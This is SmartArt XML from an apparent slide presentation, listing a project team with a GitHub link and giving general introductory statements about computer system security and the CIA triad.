            <a:t>Team</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B337D2C2-279E-4670-BF62-7785CE7E1DCA}" type="parTrans" cxnId="{9BFAF642-948A-4484-AB29-4CB10799275F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1A85279-E491-47E2-96FF-BF48543BB12A}" type="sibTrans" cxnId="{9BFAF642-948A-4484-AB29-4CB10799275F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F414B495-CACD-4D9A-B61C-334C25337CF8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>• Zinar </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Mutlu </a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5BC6F700-EEA2-4027-AA74-5121ABDFFE15}" type="parTrans" cxnId="{B45202CB-05CD-4C90-A160-40E8971C0226}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6182DC70-9D8D-4926-BFF4-12B64C47609A}" type="sibTrans" cxnId="{B45202CB-05CD-4C90-A160-40E8971C0226}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83D262D0-5A1D-49A5-82F9-9A61E8D8E523}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>• </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Andranik Voskanyan</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>  </a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D28D39C-B55F-477A-921E-7153C65170DF}" type="parTrans" cxnId="{2091B253-B669-4291-9FBD-70BE21AE42E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AE656C06-639E-4A11-8690-1B8993F0F3B9}" type="sibTrans" cxnId="{2091B253-B669-4291-9FBD-70BE21AE42E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B4EEEDDD-7B22-4FA4-9F91-56F0656112A2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>• </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Cédric</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Sipakam</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1B04414-4DA0-40BA-9A58-08FDE0E387B0}" type="parTrans" cxnId="{0D8FD856-EDA1-4C53-9C8A-F19710371449}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4ABC3619-60AB-456E-9CE4-CC75A85450DD}" type="sibTrans" cxnId="{0D8FD856-EDA1-4C53-9C8A-F19710371449}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C392C96C-81EB-4C29-A8B4-F754B9B4A3A7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Get the code:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>  github.com/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" err="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>ibeatricez</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" err="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>oss_project</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0ECFC8F6-B70E-481F-8E01-320439642132}" type="parTrans" cxnId="{0A093691-3506-49C2-8397-24130A9E539F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4CB24887-3F0B-46FC-8DB8-B4E8E72214E8}" type="sibTrans" cxnId="{0A093691-3506-49C2-8397-24130A9E539F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3DE36499-9398-4BDC-9E39-889A63C6448E}" type="pres">
      <dgm:prSet presAssocID="{4D06B16D-8AD4-4B76-8064-63331D6BF8D8}" presName="vert0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2126F946-0BAB-4BC1-861A-8DDA797E2663}" type="pres">
      <dgm:prSet presAssocID="{408FFACB-4E3D-44E8-A6E1-C630B7581E5A}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FF71FE5F-8DDC-493D-9FAA-4EBB318AF437}" type="pres">
      <dgm:prSet presAssocID="{408FFACB-4E3D-44E8-A6E1-C630B7581E5A}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{87119B14-C406-4ED7-902C-1A4844A445FD}" type="pres">
      <dgm:prSet presAssocID="{408FFACB-4E3D-44E8-A6E1-C630B7581E5A}" presName="tx1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E95A78D7-CAEA-46CB-B6F2-D045C63947B2}" type="pres">
      <dgm:prSet presAssocID="{408FFACB-4E3D-44E8-A6E1-C630B7581E5A}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7E7E6BEF-A6A4-4679-8E28-74F46A483F5F}" type="pres">
      <dgm:prSet presAssocID="{F414B495-CACD-4D9A-B61C-334C25337CF8}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ADDD6EE2-FC36-46D1-AAB4-9F9FAC42265A}" type="pres">
      <dgm:prSet presAssocID="{F414B495-CACD-4D9A-B61C-334C25337CF8}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{529E879F-B4EA-4049-BCFE-96953C1F536A}" type="pres">
      <dgm:prSet presAssocID="{F414B495-CACD-4D9A-B61C-334C25337CF8}" presName="tx1" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5D28DF7-11F5-45FA-B4A7-848449FDA254}" type="pres">
      <dgm:prSet presAssocID="{F414B495-CACD-4D9A-B61C-334C25337CF8}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AD1341A0-FEB4-4FA1-BF6B-193633168E36}" type="pres">
      <dgm:prSet presAssocID="{83D262D0-5A1D-49A5-82F9-9A61E8D8E523}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{28C3C962-CE6D-49B4-B6A5-6A1F8CEBD642}" type="pres">
      <dgm:prSet presAssocID="{83D262D0-5A1D-49A5-82F9-9A61E8D8E523}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D191C149-19EB-4A22-9941-0B8B32329B23}" type="pres">
      <dgm:prSet presAssocID="{83D262D0-5A1D-49A5-82F9-9A61E8D8E523}" presName="tx1" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6A4DCA41-9F7B-4E9E-AB97-E933677F5DCC}" type="pres">
      <dgm:prSet presAssocID="{83D262D0-5A1D-49A5-82F9-9A61E8D8E523}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{59B958C8-AC82-4805-9ACE-1BC0B896823E}" type="pres">
      <dgm:prSet presAssocID="{B4EEEDDD-7B22-4FA4-9F91-56F0656112A2}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B5B2898F-D2BC-4CF9-94BE-790054704FE6}" type="pres">
      <dgm:prSet presAssocID="{B4EEEDDD-7B22-4FA4-9F91-56F0656112A2}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3AEFBD6E-AD8F-4D49-A55B-7C9B80E0D0BF}" type="pres">
      <dgm:prSet presAssocID="{B4EEEDDD-7B22-4FA4-9F91-56F0656112A2}" presName="tx1" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3372B57D-52C5-41D3-AF11-B74BA8E936B2}" type="pres">
      <dgm:prSet presAssocID="{B4EEEDDD-7B22-4FA4-9F91-56F0656112A2}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2585B94E-23A8-4EBE-B010-450928F8297E}" type="pres">
      <dgm:prSet presAssocID="{C392C96C-81EB-4C29-A8B4-F754B9B4A3A7}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7DDD8B00-0AE2-4BEA-9B5E-194CC5A50444}" type="pres">
      <dgm:prSet presAssocID="{C392C96C-81EB-4C29-A8B4-F754B9B4A3A7}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4D0B76B7-7B5E-42F7-AF25-5A8841A2B756}" type="pres">
      <dgm:prSet presAssocID="{C392C96C-81EB-4C29-A8B4-F754B9B4A3A7}" presName="tx1" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FAAFB857-B124-4899-B6A9-CEDDE19911CE}" type="pres">
      <dgm:prSet presAssocID="{C392C96C-81EB-4C29-A8B4-F754B9B4A3A7}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{F228441B-0454-43F4-A2F7-E399217FAAF5}" type="presOf" srcId="{C392C96C-81EB-4C29-A8B4-F754B9B4A3A7}" destId="{4D0B76B7-7B5E-42F7-AF25-5A8841A2B756}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{9BFAF642-948A-4484-AB29-4CB10799275F}" srcId="{4D06B16D-8AD4-4B76-8064-63331D6BF8D8}" destId="{408FFACB-4E3D-44E8-A6E1-C630B7581E5A}" srcOrd="0" destOrd="0" parTransId="{B337D2C2-279E-4670-BF62-7785CE7E1DCA}" sibTransId="{E1A85279-E491-47E2-96FF-BF48543BB12A}"/>
    <dgm:cxn modelId="{578DEA64-C347-41A6-B2F9-6EBE9B7626CF}" type="presOf" srcId="{408FFACB-4E3D-44E8-A6E1-C630B7581E5A}" destId="{87119B14-C406-4ED7-902C-1A4844A445FD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{8DFAFF6A-FEAD-4D3E-9C3B-94229F463186}" type="presOf" srcId="{83D262D0-5A1D-49A5-82F9-9A61E8D8E523}" destId="{D191C149-19EB-4A22-9941-0B8B32329B23}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{2091B253-B669-4291-9FBD-70BE21AE42E3}" srcId="{4D06B16D-8AD4-4B76-8064-63331D6BF8D8}" destId="{83D262D0-5A1D-49A5-82F9-9A61E8D8E523}" srcOrd="2" destOrd="0" parTransId="{6D28D39C-B55F-477A-921E-7153C65170DF}" sibTransId="{AE656C06-639E-4A11-8690-1B8993F0F3B9}"/>
    <dgm:cxn modelId="{0D8FD856-EDA1-4C53-9C8A-F19710371449}" srcId="{4D06B16D-8AD4-4B76-8064-63331D6BF8D8}" destId="{B4EEEDDD-7B22-4FA4-9F91-56F0656112A2}" srcOrd="3" destOrd="0" parTransId="{D1B04414-4DA0-40BA-9A58-08FDE0E387B0}" sibTransId="{4ABC3619-60AB-456E-9CE4-CC75A85450DD}"/>
    <dgm:cxn modelId="{0A093691-3506-49C2-8397-24130A9E539F}" srcId="{4D06B16D-8AD4-4B76-8064-63331D6BF8D8}" destId="{C392C96C-81EB-4C29-A8B4-F754B9B4A3A7}" srcOrd="4" destOrd="0" parTransId="{0ECFC8F6-B70E-481F-8E01-320439642132}" sibTransId="{4CB24887-3F0B-46FC-8DB8-B4E8E72214E8}"/>
    <dgm:cxn modelId="{79E052BE-0B10-466D-B2DE-DE3BD17A5B9E}" type="presOf" srcId="{4D06B16D-8AD4-4B76-8064-63331D6BF8D8}" destId="{3DE36499-9398-4BDC-9E39-889A63C6448E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{B45202CB-05CD-4C90-A160-40E8971C0226}" srcId="{4D06B16D-8AD4-4B76-8064-63331D6BF8D8}" destId="{F414B495-CACD-4D9A-B61C-334C25337CF8}" srcOrd="1" destOrd="0" parTransId="{5BC6F700-EEA2-4027-AA74-5121ABDFFE15}" sibTransId="{6182DC70-9D8D-4926-BFF4-12B64C47609A}"/>
    <dgm:cxn modelId="{30094BCF-487E-454F-878D-86AA841478A9}" type="presOf" srcId="{B4EEEDDD-7B22-4FA4-9F91-56F0656112A2}" destId="{3AEFBD6E-AD8F-4D49-A55B-7C9B80E0D0BF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{586CBDEB-1D6A-4358-982F-E3800467986E}" type="presOf" srcId="{F414B495-CACD-4D9A-B61C-334C25337CF8}" destId="{529E879F-B4EA-4049-BCFE-96953C1F536A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{21801807-B0B0-4597-9D38-327190B309CD}" type="presParOf" srcId="{3DE36499-9398-4BDC-9E39-889A63C6448E}" destId="{2126F946-0BAB-4BC1-861A-8DDA797E2663}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{3B421C49-DF82-4B26-A2E9-C778B1E1B218}" type="presParOf" srcId="{3DE36499-9398-4BDC-9E39-889A63C6448E}" destId="{FF71FE5F-8DDC-493D-9FAA-4EBB318AF437}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D39865DA-F132-4E76-938A-F57F9D064507}" type="presParOf" srcId="{FF71FE5F-8DDC-493D-9FAA-4EBB318AF437}" destId="{87119B14-C406-4ED7-902C-1A4844A445FD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{35A0E5E4-261C-46BB-9B7A-30163D60868C}" type="presParOf" srcId="{FF71FE5F-8DDC-493D-9FAA-4EBB318AF437}" destId="{E95A78D7-CAEA-46CB-B6F2-D045C63947B2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{BD7D92E3-A40F-45FD-B745-B671B361B032}" type="presParOf" srcId="{3DE36499-9398-4BDC-9E39-889A63C6448E}" destId="{7E7E6BEF-A6A4-4679-8E28-74F46A483F5F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{6823BA2C-DFF5-410F-8410-FBC85C1284B2}" type="presParOf" srcId="{3DE36499-9398-4BDC-9E39-889A63C6448E}" destId="{ADDD6EE2-FC36-46D1-AAB4-9F9FAC42265A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{64C5882A-3E95-4F59-8172-E531F21303A7}" type="presParOf" srcId="{ADDD6EE2-FC36-46D1-AAB4-9F9FAC42265A}" destId="{529E879F-B4EA-4049-BCFE-96953C1F536A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{9B2AE2CC-5E21-43F4-BC81-9D1AC88B40ED}" type="presParOf" srcId="{ADDD6EE2-FC36-46D1-AAB4-9F9FAC42265A}" destId="{C5D28DF7-11F5-45FA-B4A7-848449FDA254}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{4329674A-E6C6-4699-976E-58E10103EE8E}" type="presParOf" srcId="{3DE36499-9398-4BDC-9E39-889A63C6448E}" destId="{AD1341A0-FEB4-4FA1-BF6B-193633168E36}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E2813BDB-09D4-4E39-8015-C0E466D487BA}" type="presParOf" srcId="{3DE36499-9398-4BDC-9E39-889A63C6448E}" destId="{28C3C962-CE6D-49B4-B6A5-6A1F8CEBD642}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{69F4AC17-70FF-4CF3-BDBA-3A72880FA463}" type="presParOf" srcId="{28C3C962-CE6D-49B4-B6A5-6A1F8CEBD642}" destId="{D191C149-19EB-4A22-9941-0B8B32329B23}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{177FAA0C-87F9-44EE-9F3D-3232A9D10EE7}" type="presParOf" srcId="{28C3C962-CE6D-49B4-B6A5-6A1F8CEBD642}" destId="{6A4DCA41-9F7B-4E9E-AB97-E933677F5DCC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{59138FFA-AB1D-4BB6-8654-3D42877BFBE1}" type="presParOf" srcId="{3DE36499-9398-4BDC-9E39-889A63C6448E}" destId="{59B958C8-AC82-4805-9ACE-1BC0B896823E}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{96D3987A-1A89-407C-874F-9F6203F7BBDB}" type="presParOf" srcId="{3DE36499-9398-4BDC-9E39-889A63C6448E}" destId="{B5B2898F-D2BC-4CF9-94BE-790054704FE6}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{C33EB16C-159B-4070-BAC6-E1603BFD7C64}" type="presParOf" srcId="{B5B2898F-D2BC-4CF9-94BE-790054704FE6}" destId="{3AEFBD6E-AD8F-4D49-A55B-7C9B80E0D0BF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{22DE2E52-7796-49FE-86DC-B445FA716932}" type="presParOf" srcId="{B5B2898F-D2BC-4CF9-94BE-790054704FE6}" destId="{3372B57D-52C5-41D3-AF11-B74BA8E936B2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{2FC3DB0B-F92C-472A-BD7C-EF5FA6245AAF}" type="presParOf" srcId="{3DE36499-9398-4BDC-9E39-889A63C6448E}" destId="{2585B94E-23A8-4EBE-B010-450928F8297E}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{B01A7A3C-A65A-407D-9EE4-B8CA176CC2CD}" type="presParOf" srcId="{3DE36499-9398-4BDC-9E39-889A63C6448E}" destId="{7DDD8B00-0AE2-4BEA-9B5E-194CC5A50444}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{66BF356B-F393-48DD-B6AD-A63742F6220D}" type="presParOf" srcId="{7DDD8B00-0AE2-4BEA-9B5E-194CC5A50444}" destId="{4D0B76B7-7B5E-42F7-AF25-5A8841A2B756}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7D6A4FC5-EAB9-490D-9AE5-7BABCD3BE5FE}" type="presParOf" srcId="{7DDD8B00-0AE2-4BEA-9B5E-194CC5A50444}" destId="{FAAFB857-B124-4899-B6A9-CEDDE19911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E9CF36-3E92-45BD-AB57-23D770B5354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293BB0-D691-4226-8763-2F7E264D911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accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Ensuring the security of a computer system is a critical task. It involves maintaining the confidentiality, integrity, and availability of the operating system and its resources.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95F01A02-17C7-455B-933D-97A36BAF31E7}" type="parTrans" cxnId="{97001BFE-3EF1-462C-B013-B6A6D3824A7D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{44BE5F43-0E5B-4CB6-ADAD-A43CCEC65A24}" type="sibTrans" cxnId="{97001BFE-3EF1-462C-B013-B6A6D3824A7D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFBC4CD1-8A2D-44A7-879B-FF58E505D11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accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Security not only demands an adequate internal protection mechanism but also requires careful consideration of the external environment in which the system operates.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{447C1B53-8237-474B-934B-936CADF6B282}" type="parTrans" cxnId="{FF258FF8-8647-49EA-95B3-BADE79E1C159}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C2D2352C-31FE-4266-97C6-6DAD1EDAA68B}" type="sibTrans" cxnId="{FF258FF8-8647-49EA-95B3-BADE79E1C159}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A119096A-1BA1-4880-B375-5FFAFBB7D90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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>A computer system is considered secure when its resources are accessed and utilized as intended, under all circumstances which is including stealth attacks. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{27CD8C45-B9FB-42D0-A8AD-18C1E5B2B83C}" type="parTrans" cxnId="{1501389F-F05D-4716-9409-A5EAC4362818}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
